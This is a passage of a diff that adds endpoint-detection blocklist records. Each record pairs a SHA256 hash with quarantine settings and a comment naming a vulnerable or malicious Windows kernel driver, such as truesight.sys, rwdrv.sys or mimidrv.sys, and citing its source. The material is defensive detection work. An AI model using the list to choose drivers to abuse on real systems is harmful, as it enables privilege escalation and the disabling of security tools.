"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500121Z", + "creation_date": "2026-03-23T11:45:31.500124Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab650310346e12c495d166265324002af2fe2d71a8cba692a58790ec1a834d4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6671165-9be8-5756-a65f-91c681131817", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972577Z", + "creation_date": "2026-03-23T11:45:29.972580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b2f051ac901ab47d0012a1002cb8b2db28c14e9480c0dd55e1ac11c81ba9285", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e67dafc2-e245-5d0b-b63d-6fe9b653f5c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982121Z", + "creation_date": "2026-03-23T11:45:29.982123Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982129Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45ba688a4bded8a7e78a4f5b0dc21004e951ddceb014bb92f51a3301d2fbc56a", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e68be877-9184-5e8f-ae55-168f84e6a19f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160927Z", + "creation_date": 
"2026-03-23T11:45:31.160929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b205985dc6fb5cc86bc0183295733792f6381cbc4fd71ebadddaa4580efc111b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e696b159-00cc-5604-8380-72a6bee9cff4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480269Z", + "creation_date": "2026-03-23T11:45:31.480273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480283Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64c691ba709918402a9057476a20c115553114cc561a0e747fe9051a3a6e59e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "e6972193-88d6-5f37-a185-d739c22309dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827838Z", + "creation_date": "2026-03-23T11:45:30.827840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827845Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b6f84253fa4636d168adb43f17cab909078468c3642370fad468814ee494468", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e69ad721-17ab-5aee-8b0b-6e9f507b9c74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611325Z", + "creation_date": "2026-03-23T11:45:29.611327Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "942a7b2ebca0edeff5803c8f899ee455c0ec279542c41d2db2664d58c1025c86", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e69c56b2-6322-56ed-a556-3482426443af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157032Z", + "creation_date": "2026-03-23T11:45:31.157034Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b161aa3620aeb3f956d2fed22b8031e1f822c8f25dd8658988d40b34082d053", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e69f04f4-1ae0-5d12-862c-973a02400602", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158974Z", + "creation_date": "2026-03-23T11:45:31.158976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158982Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19b048d27c93af7f35c406803cadf3f5c11db7a7bbb302a7c3b75814b463c3ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6a80a26-709c-5a5f-bc2d-47af6e11dd4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815234Z", + "creation_date": "2026-03-23T11:45:31.815237Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "f23b826fcf9dbb3f30896d08df697232cf627e7893a47a6d57f1fc9f42cb75c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6af817a-bc47-55f0-bdb0-a261c62262e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823701Z", + "creation_date": "2026-03-23T11:45:30.823703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71e98a83634fde14dc0b117a7aaee15ad5926f3dacf573b53390ff0dedc3e219", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6ca9fb7-73db-5b30-826a-f594e2371182", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973671Z", + "creation_date": "2026-03-23T11:45:29.973673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973678Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5192ec4501d0fe0b1c8f7bf9b778f7524a7a70a26bbbb66e5dab8480f6fdbb8b", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6d9077d-e298-552e-9575-aba16e43de8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979411Z", + "creation_date": "2026-03-23T11:45:29.979413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86047bb1969d1db455493955fd450d18c62a3f36294d0a6c3732c88dfbcc4f62", + "comment": "Malicious 
Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6ddea18-6801-537a-b3cb-b61ddecd9cf7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828583Z", + "creation_date": "2026-03-23T11:45:31.828585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "404ca49fd22c7f9b7e575b5dec71a649c043486886f5f8b2349b0486a38c3e53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6e7f4e1-ed2a-5feb-bc40-af648abeaaf0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151281Z", 
+ "creation_date": "2026-03-23T11:45:31.151283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ecdaef6f3da089597a58aff6ce473394cb9fc3ae32865a08127be953beade95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6ec4d76-b073-5241-9b05-1bc4ce5402a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818312Z", + "creation_date": "2026-03-23T11:45:30.818314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6297556f66cd6619057f3a5b216b314f8a27eebb5fa575ee07a1944aca71ae80", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e6f4d3be-d76d-5abc-afcf-442bf420cc9b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481551Z", + "creation_date": "2026-03-23T11:45:31.481555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7c6108816ce5583c38d8f9a98f6e6887eb9c02deb6ec37e1d8c9b09916b12b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6f7c745-c581-51fa-9b5d-02d419cb87d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144446Z", + "creation_date": "2026-03-23T11:45:31.144448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.144453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a562438824f1f074c1eee38e458ca39a2f7452d37e357f3866b1b70b01f4ac26", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6fe4994-8c6b-569f-901f-4bc1deaeedc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470430Z", + "creation_date": "2026-03-23T11:45:30.470434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470443Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26908983e18b807894909d11d6d0fa2d8fbe7544b61184267851c2a839f3b306", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e701b408-1477-59e4-8884-a7f5049a263f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830186Z", + "creation_date": "2026-03-23T11:45:31.830188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "063c06d788da475d86bf443fe2d87f474cf614d686ba2add3b5fe6116f532194", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7054bd7-74b6-588d-bd6b-096ed27ddb23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495761Z", + "creation_date": "2026-03-23T11:45:31.495763Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "da587211d665f55428e281ab6c4ea9164fb8420aa3cb82ff4509c4f10a1d0fef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e70dadb7-51e4-5b76-91f0-3d6b68d1abe9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484815Z", + "creation_date": "2026-03-23T11:45:31.484819Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9faef848ca903958f958e420edd216a18621adedfe56fc77d835f8237bcef41", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e710fef6-5112-5732-872a-b3ecff50ec86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487361Z", + "creation_date": "2026-03-23T11:45:31.487363Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487368Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f4daffa9ffe2dacb00343990ee197cb86415519466b5cc3bf8ff33108af51df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e717fabd-e5de-5109-941b-2e4161f21b07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476862Z", + "creation_date": "2026-03-23T11:45:30.476865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476887Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "615c391666b0fdaa0a8096320d35c7b951e6a0ee7f984ab3e892f838cb212b60", + "comment": "Vulnerable Kernel Driver (aka 
libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e71e6de8-085c-5f5a-b66b-c5d193e6afed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499296Z", + "creation_date": "2026-03-23T11:45:31.499299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ca54132ee9953d408688e17facfe8a0bc9bf93e73085c6782ab076a0c3aa2a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 